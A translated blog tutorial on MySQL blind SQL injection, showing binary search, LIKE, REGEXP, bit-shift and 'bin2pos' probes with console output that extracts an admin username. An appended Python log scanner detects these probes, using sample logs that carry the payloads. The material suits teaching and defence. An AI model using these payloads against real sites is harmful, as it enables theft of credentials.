Exploring blind SQLi methods

Reposted from: http://laterain.sinaapp.com/?p=196
-> Exploring blind injection methods
 
1. Binary search
Not much to say about this one, everyone knows it; the 啊D tool uses this method.
Speed: log2(N)
 
 
 
2. Fuzzy matching (LIKE)
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'a%';
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'adn%';
Empty set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'adm%';
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'admin';
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> name = admin
 
 
 
3. Regex matching
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[0-9]' ;
Empty set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-z]' ;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-h]' ;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-a]' ;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
======> name[0] = a
 
 
 
4. Bit-shift method
a(10) = 97
a(2) = 01100001
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>7)=0;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> 01100001 shifted right by 7 bits becomes 00000000
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>6)=0;
Empty set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>6)=1;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> 01100001 shifted right by 6 bits becomes 00000001
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>5)=2;
Empty set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>5)=3;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> 01100001 shifted right by 5 bits becomes 00000011
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>4)=6;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>4)=7;
Empty set (0.00 sec)
 
====> 01100001 shifted right by 4 bits becomes 00000110
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>3)=12;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>3)=13;
Empty set (0.00 sec)
 
====> 01100001 shifted right by 3 bits becomes 00001100
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>2)=24;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>2)=25;
Empty set (0.00 sec)
 
====> 01100001 shifted right by 2 bits becomes 00011000
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>1)=48;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>1)=49;
Empty set (0.00 sec)
 
====> 01100001 shifted right by 1 bit becomes 00110000
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>0)=96;
Empty set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>0)=97;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> 01100001 shifted right by 0 bits stays 01100001
====> name[0] = a
Speed: a fixed 7 steps
 
 
 
5. bin2pos
The previous ones are all easy to understand and most people already know them; this last one I only saw today. It is rather odd, and I do not know how to translate its name... I am also not sure that my understanding matches the author's,
so I will explain it the way I think of it.
 
The statement given by the author:
IF((@a:=MID(BIN(POSITION(MID((SELECT password FROM users WHERE id=2 LIMIT 1),1,1)IN(CHAR(48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70))),1,1))!=space(0),2-@a,0/0)
 
My cleaned-up statement:
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),1,1),"abcdefghijklmno")),1,1),@i,0);
locate and position do much the same thing, so I used locate
(select name from ylmf_admin_user limit 1) is the query we actually care about
mid((select name from ylmf_admin_user limit 1),1,1) then takes the first character of the query result
locate(mid((select name from ylmf_admin_user limit 1),1,1),"abcdefghijklmno") then maps that character onto the string abcdefghijklmno, returning its position in that string; a, for example, gives 1
bin() then converts that position to binary
mid() then extracts one digit of the binary string
which is assigned to @i
finally if(expr, res1, res2) makes the decision; I set res1 to @i because @i can only ever be 0 or 1
 
mysql> select site_url from ylmf_links where id=40 and if(@i:=length(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")))>0,1,0);
 
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> mid((select name from ylmf_admin_user limit 1),2,1) returned data
 
mysql> select site_url from ylmf_links where id=40 and if(@i:=length(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")))>2,1,0);
 
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and if(@i:=length(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")))>3,1,0);
 
Empty set (0.00 sec)
 
====> the bin result is 3 digits long
 
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),1,1),@i,0);
 
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> digit 1 of the bin result is 1
 
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),2,1),@i,0);
 
Empty set (0.00 sec)
 
====> digit 2 of the bin result is 0
 
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),3,1),@i,0);
 
Empty set (0.00 sec)
 
====> digit 3 of the bin result is 0 ====> bin result 100, i.e. d
Why map onto abcdefghijklmno? Because abcdefghijklmno has length 15 and bin(15)=1111, which keeps the bin result short and saves time when working out its length. If mid((select name from ylmf_admin_user limit 1),2,1) returns no data and you are sure the statement is correct, replace abcdefghijklmno with another set, e.g. ABCDEFGHIJKLMNO
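As an added example from the defender's side (not part of the original post), here is a small Python scanner that recognises the five probe shapes above in web-server access logs and flags a client that cycles through them against one path. The Common Log Format parser, the signature regexes and the sample log lines are all constructed here; the binary-search signature assumes the usual ASCII(MID(...)) comparison, which the post does not show.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Signatures for the probe shapes discussed above, tested against the URL-decoded,
# lower-cased request target. The bit-shift form also contains ASCII(MID(...)),
# so it is checked before the plain comparison used by binary search.
PROBE_SIGNATURES = [
    ("bit_shift",     re.compile(r"ascii\s*\(.*?\)\s*>>\s*\d+\s*\)\s*=\s*\d+")),
    ("binary_search", re.compile(r"ascii\s*\(.*?\)\s*[<>]=?\s*\d+")),  # assumed form
    ("like_prefix",   re.compile(r"\)\s*like\s*'[^']*%'")),
    ("regexp_class",  re.compile(r"regexp\s*'\^\[[^\]]+\]")),
    ("bin2pos",       re.compile(r"bin\s*\(\s*(?:locate|position)\s*\(")),
]
# Common Log Format: client address, then the quoted request line.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the probe style a request target matches, or None for a clean request."""
    decoded = unquote_plus(target).lower()
    return next((label for label, pat in PROBE_SIGNATURES if pat.search(decoded)), None)

def scan(lines):
    """Count probe styles per (client ip, path); one client cycling through
    several styles against one path is the signature of a blind extraction."""
    hits = defaultdict(Counter)
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (label := classify(m["target"])):
            hits[(m["ip"], m["target"].split("?", 1)[0])][label] += 1
    return hits

def flag(lines, threshold=3):
    """Sources whose probe count against one path reaches the threshold."""
    return [(ip, path, sum(c.values()), dict(c))
            for (ip, path), c in scan(lines).items() if sum(c.values()) >= threshold]

# Constructed sample log (not real traffic): one client replaying the probes shown above.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0800] "GET /links.php?id=40 HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:37 +0800] "GET /links.php?id=40%20and%20(select%20name%20from%20ylmf_admin_user%20limit%201)%20LIKE%20'a%25' HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:38 +0800] "GET /links.php?id=40%20and%20MID((select%20name%20from%20ylmf_admin_user%20limit%201),1,1)%20REGEXP%20'^[a-h]' HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:39 +0800] "GET /links.php?id=40%20and%20(ASCII(MID((select%20name%20from%20ylmf_admin_user%20limit%201),1,1))>>7)=0 HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:40 +0800] "GET /links.php?id=40%20and%20if(@i:=mid(bin(locate(mid((select%20name%20from%20ylmf_admin_user%20limit%201),1,1),%22abcdefghijklmno%22)),1,1),@i,0) HTTP/1.1" 200 512
198.51.100.2 - - [10/Oct/2023:13:56:01 +0800] "GET /links.php?id=41 HTTP/1.1" 200 498
"""

if __name__ == "__main__":
    for ip, path, total, styles in flag(SAMPLE_LOG.splitlines()):
        print(f"{ip} {path}: {total} blind-SQLi probes {styles}")
```

The per-style counters are what make this useful beyond a single-request WAF rule: a real extraction produces dozens of near-identical requests whose only variation is the probe value.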
